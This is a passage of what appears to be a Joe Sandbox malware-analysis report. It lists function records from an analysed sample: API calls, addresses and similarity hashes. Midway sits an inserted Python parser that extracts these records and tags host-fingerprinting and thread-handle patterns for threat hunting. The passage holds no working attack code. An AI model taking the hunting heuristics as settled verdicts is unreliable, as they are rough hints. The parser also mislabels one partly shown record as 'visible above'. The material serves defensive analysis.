                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu$\VH
                                                                        • API String ID: 3164766367-2432546070
                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 3850602802-3636473452
                                                                        • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                        • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                        • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 3985565216-0
                                                                        • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                        • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                        • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0041F707
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • _free.LIBCMT ref: 0041F71A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free_malloc
                                                                        • String ID: [B
                                                                        • API String ID: 1020059152-632041663
                                                                        • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                        • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                        • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                        • __calloc_crt.LIBCMT ref: 00413DB0
                                                                        • __getptd.LIBCMT ref: 00413DBD
                                                                        • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                        • _free.LIBCMT ref: 00413E07
                                                                        • __dosmaperr.LIBCMT ref: 00413E12
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 155776804-0
                                                                        • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                        • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                        • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                        APIs
                                                                          • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                          • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                        • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                        • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
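Added example, not part of the Joe Sandbox report and not Joe Sandbox code: a parser for the IDA-plugin function records listed in this section (the APIs / Memory Dump Source / Similarity blocks) that extracts each function's direct API call sequence and its similarity hashes for hunting, and tags two call sequences visible above, the GetVolumeInformationW followed by __swprintf("%lu") record at 0045D459 and the DuplicateHandle plus CreateThread record at 00436C88. The layout rules and both heuristic tags are assumptions read off the listing format on this page, and the embedded sample text is copied from those two records.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag API call sequences.

Added example, not Joe Sandbox code. The record layout (an "APIs" line opens a
record, "Strings" / "Memory Dump Source" / "Joe Sandbox IDA Plugin" /
"Similarity" open sub-sections, bullets carry "Name.MODULE(args), ref: ADDR"
or "Key: value") is an assumption read off the report on this page."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this report (the function at
# 0045D459 and the function at 00436C88), layout whitespace removed.
SAMPLE = """\
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\\VH
• API String ID: 3164766367-2432546070
• Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• API String ID: 1957940570-0
• Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$"
)
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None = None  # set when the call is inside a callee


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # dump and Similarity fields


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    section = ""
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":  # a new function record starts here
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if current is None:
            continue
        if stripped in SECTIONS:
            section = stripped
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in m["args"].split(",") if a] if m["args"] else []
                current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        else:
            m = KV_RE.match(line)
            if m:
                current.meta[m["key"].strip()] = m["val"].strip()
    return records


def direct_sequence(rec: FunctionRecord) -> list[str]:
    """API names called directly by the function, in listing order (subcalls excluded)."""
    return [c.name for c in rec.calls if c.subcall_of is None]


def flag_patterns(rec: FunctionRecord) -> set[str]:
    """Heuristic tags for an analyst to review; hunting hints, not verdicts."""
    seq = direct_sequence(rec)
    tags: set[str] = set()
    # GetVolumeInformation* followed by a printf-family call: the volume serial
    # number being formatted into a string, a common host-fingerprint idiom.
    vol = [i for i, n in enumerate(seq) if n.startswith("GetVolumeInformation")]
    if vol and any("printf" in n for n in seq[vol[0] + 1:]):
        tags.add("volume-serial-to-string")
    if "DuplicateHandle" in seq and "CreateThread" in seq:
        tags.add("handle-duplication-before-thread")
    return tags


def hunting_indicators(rec: FunctionRecord) -> dict[str, str]:
    """Similarity values worth carrying into a search for related samples."""
    keys = ("API String ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash")
    return {k: rec.meta[k] for k in keys if k in rec.meta}
```

Run the parser over a saved copy of the report's function listing rather than this sample to get every record; the Instruction Fuzzy Hash and API String ID values are what to pivot on when looking for other samples that share the same functions, while the tags only tell an analyst which records to read first.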
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                        • String ID:
                                                                        • API String ID: 259663610-0
                                                                        • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                        • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                        • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004302E6
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                        • GetClientRect.USER32(?,?), ref: 00430364
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                        • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                        • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                        • String ID:
                                                                        • API String ID: 3220332590-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1612042205-0
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _memmove_strncmp
                                                                        • String ID: >$U$\
                                                                        • API String ID: 2666721431-237099441
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C570
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                        • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                        • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                        • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 2221674350-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _wcscpy$_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2037614760-0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                        • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                        Similarity
                                                                        • API ID: Variant$Copy$AllocClearErrorLastString
                                                                        • String ID:
                                                                        • API String ID: 960795272-0
                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Similarity
                                                                        • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 4189319755-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                        • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                        • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow$InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1976402638-0
                                                                        APIs
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                        • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                        • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                        • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                        • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                        Similarity
                                                                        • API ID: Window$Enable$Show$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 1871949834-0
                                                                        • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                        • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                        • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                        • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                        • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                        • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                        • SendMessageW.USER32 ref: 00471AE3
                                                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 3611059338-0
                                                                        • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                        • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                        • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
